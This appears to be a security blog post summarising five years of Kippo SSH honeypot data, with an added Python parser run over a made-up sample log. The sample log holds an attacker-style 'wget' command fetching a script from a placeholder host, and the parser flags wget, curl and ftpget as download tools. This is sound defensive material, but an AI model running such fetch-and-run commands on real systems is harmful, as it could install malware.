Five years ago we started with our first Kippo honeypot. The goal was to gather information about attackers and to visualize what attackers are doing. Last week, after 5 years of duty, it was time for a hardware change. We finally executed the 'poweroff' command. Within 10 seconds the honeypot was silenced forever. The data turned out to be much more than we hoped for. We received a large amount of honeypot data and ran some stats which we would like to share.
First attack: July 2010
Last attack: July 2015
Total login attempts: 3620211
Total number of commands: 42688
Total number of TTY: 6207
Most used username: root (duh)
Most used password: root (duh)
Most used client: SSH-2.0-Putty
Most used command: ls
Number of password change attempts: 279
Total number of downloads: 15484
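The stats above are counters over the honeypot's log lines. As an added example (not code from the original post), here is a small parser that derives the same kind of counters from a constructed sample, assuming the Kippo-style "login attempt [user/pass]", "Remote SSH version:" and "CMD:" line forms and a hypothetical source-IP layout in the transport tag.

```python
import re
from collections import Counter

# Constructed sample in the shape of kippo.log entries (assumption: the
# "login attempt", "Remote SSH version" and "CMD:" line forms); not data
# from the original post. Source IPs are documentation ranges.
SAMPLE_LOG = """\
2015-07-01 10:00:00+0000 [HoneyPotTransport,1,203.0.113.5] Remote SSH version: SSH-2.0-PuTTY_Release_0.64
2015-07-01 10:00:01+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.5] login attempt [root/123456] failed
2015-07-01 10:00:02+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.5] login attempt [root/root] succeeded
2015-07-01 10:00:03+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.5] CMD: ls
2015-07-01 10:00:04+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.5] CMD: wget http://example.invalid/x.sh
2015-07-01 11:00:00+0000 [HoneyPotTransport,2,198.51.100.7] Remote SSH version: SSH-2.0-libssh2_1.4.3
2015-07-01 11:00:01+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.7] login attempt [admin/admin] failed
2015-07-01 11:00:02+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.7] login attempt [root/toor] failed
2015-07-01 11:00:03+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.7] login attempt [root/root] succeeded
2015-07-01 11:00:04+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,2,198.51.100.7] CMD: ls
2015-07-01 11:00:05+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,2,198.51.100.7] CMD: passwd
"""

LOGIN_RE = re.compile(r"login attempt \[([^/\]]*)/([^\]]*)\] (succeeded|failed)")
CLIENT_RE = re.compile(r"Remote SSH version: (\S+)")
CMD_RE = re.compile(r"CMD: (.+)$")
SRC_RE = re.compile(r"HoneyPotTransport,\d+,([\d.]+)\]")  # assumed tag layout

def summarize(log_text):
    """Return the counters behind stats like the ones in the post."""
    stats = {"logins": 0, "users": Counter(), "passwords": Counter(),
             "clients": Counter(), "commands": Counter(), "sources": Counter(),
             "passwd_changes": 0, "downloads": 0}
    for line in log_text.splitlines():
        if (m := LOGIN_RE.search(line)):
            stats["logins"] += 1
            stats["users"][m.group(1)] += 1
            stats["passwords"][m.group(2)] += 1
            if (src := SRC_RE.search(line)):   # per-IP count, joinable with firewall logs
                stats["sources"][src.group(1)] += 1
        elif (m := CLIENT_RE.search(line)):
            stats["clients"][m.group(1)] += 1
        elif (m := CMD_RE.search(line)):
            verb = m.group(1).strip().split()[0]  # first word of the command line
            stats["commands"][verb] += 1
            stats["passwd_changes"] += verb == "passwd"
            stats["downloads"] += verb in ("wget", "curl", "ftpget")
    return stats

def top(counter):
    """Most frequent key in a counter, or None when it is empty."""
    return counter.most_common(1)[0][0] if counter else None
```

The "sources" counter is the key you would join against firewall logs to see which probing addresses your perimeter already blocks.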
'OMG', what an amazing amount of data. Of course we did regular monitoring, but seeing all this data at once is something else. It still amazes me how many different attacks we recorded. First there is the script kid who is trying to create his own botnet, then there are the kind of people who like to play GTA and are trying to set up a gaming server to play with their friends, and last of course the more serious attacker.
We try to push most of the gathered samples to VirusTotal (VT). Some of the time the samples had a detection ratio of 0 or close to zero. This shows that attackers constantly recompile or update the tools they are using. Although the detection ratio has increased lately, this is mostly due to automated attacks and better detection by AV companies. This data has been used to make the world a bit more secure, but also to explain to people that antivirus applications are not always accurate. This is pretty obvious in the community, but not for the typical management suite.
Sometimes attacks are just so funny to see. Attackers use their own name as a password or download files from their own webpage. Operational security is not always in place. I know your own name is easy to remember... but seriously.
Lately we have seen many attacks from the recently exposed 'team' named 'CHINaZ' by MalwareMustDie. After the recent takedowns the attacks dried up, or rather completely disappeared. That was an amazing job.
If you or your organization is thinking about deploying honeypots, then I have only one piece of advice: do it. The amount of information you get is so important. The possibilities with this information are endless; for instance, you can compare firewall logs with the data from your honeypot, or just share the information within the community. A while ago someone asked me why sharing data is important. There is no easy answer; everybody has his own motivations. I think that alerting others about threats makes the internet safer. Just be careful.
A big thank you to the community for providing the open-source tools, especially Ion Koniaris and Upi Tamminen!